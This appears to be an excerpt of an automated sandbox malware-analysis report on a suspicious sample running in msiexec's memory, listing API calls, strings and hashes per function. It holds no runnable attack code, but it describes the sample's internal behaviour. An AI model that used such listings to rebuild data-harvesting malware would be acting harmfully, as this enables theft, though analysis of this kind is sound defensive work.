                                                                                                      • API String ID: 313946961-1552265934
                                                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                                                      • API String ID: 0-1953309616
                                                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                      • API String ID: 3510742995-272990098
                                                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                      • memset.MSVCRT ref: 0040C439
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1265369119-0
                                                                                                      • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                      • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                      • free.MSVCRT ref: 0040E9D3
                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2241099983-0
                                                                                                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                      APIs
                                                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                      • malloc.MSVCRT ref: 004174BD
                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                      • free.MSVCRT ref: 004174E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 4053608372-0
                                                                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1471605966-0
                                                                                                      • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                      • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                      APIs
                                                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                      • String ID: \StringFileInfo\
                                                                                                      • API String ID: 102104167-2245444037
                                                                                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memicmpwcslen
                                                                                                      • String ID: @@@@$History
                                                                                                      • API String ID: 1872909662-685208920
                                                                                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004100FB
                                                                                                      • memset.MSVCRT ref: 00410112
                                                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                      • String ID: </%s>
                                                                                                      • API String ID: 3400436232-259020660
                                                                                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D58D
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                      • String ID: caption
                                                                                                      • API String ID: 1523050162-4135340389
                                                                                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                      • String ID: MS Sans Serif
                                                                                                      • API String ID: 210187428-168460110
                                                                                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_wcsicmpmemset
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 2747424523-2167791130
                                                                                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                                                      • API String ID: 3150196962-1506664499
                                                                                                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 3384217055-0
                                                                                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                      APIs
                                                                                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                      • GetMenu.USER32(?), ref: 00410F8D
                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889144086-0
                                                                                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                      APIs
                                                                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                      • GetLastError.KERNEL32 ref: 0041810A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                      • String ID:
                                                                                                      • API String ID: 1661045500-0
                                                                                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
